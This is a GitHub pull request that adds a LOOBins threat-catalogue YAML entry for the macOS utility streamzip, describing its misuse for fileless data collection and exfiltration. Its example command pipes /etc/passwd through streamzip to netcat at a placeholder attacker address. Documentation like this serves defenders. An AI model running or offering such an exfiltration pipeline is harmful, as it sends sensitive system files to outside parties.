Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Adds LOOBin for streamzip #192

Merged
merged 1 commit into from
Jul 28, 2024
Merged
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
23 changes: 23 additions & 0 deletions LOOBins/streamzip.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,23 @@
name: streamzip
author: Gabriel De Jesus (0xv1n)
short_description: File-less compression of data passed in through stdin.
full_description: streamzip is a system utility that can be utilized to compress data from "stdin" and write the data directly to "stdout", no temporary files are created. The tool can be used by malicious actors to collect and exfiltrate sensitive data without leaving staged data archive artifacts on disk.
created: 2024-07-15
example_use_cases:
- name: Copy and compress sensitive data locally
description: The following command reads file data and compresses the data for exfiltration
code: dd if=/etc/passwd | streamzip - stream | nc ATTACKER_IP PORT
tactics:
- Collection
- Exfiltration
tags:
- files
- compress
paths:
- /usr/bin/streamzip
detections:
- name: No detection content at time of writing
url: N/A
resources:
- name: streamzip man page
url: https://docs.oracle.com/cd/E88353_01/html/E37839/streamzip-1.html
Loading